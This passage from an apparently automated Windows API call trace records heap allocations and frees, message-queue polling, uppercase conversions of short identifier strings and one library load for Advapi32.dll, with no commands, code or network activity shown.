(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.325] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.325] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0200.325] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0200.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.326] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.326] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.326] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0200.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.327] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.327] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.327] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.328] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.329] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0200.329] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0200.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.330] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.330] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0200.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.331] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.331] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.331] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18a8 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.331] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.332] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.332] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.333] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.333] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.334] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.334] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.335] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.335] 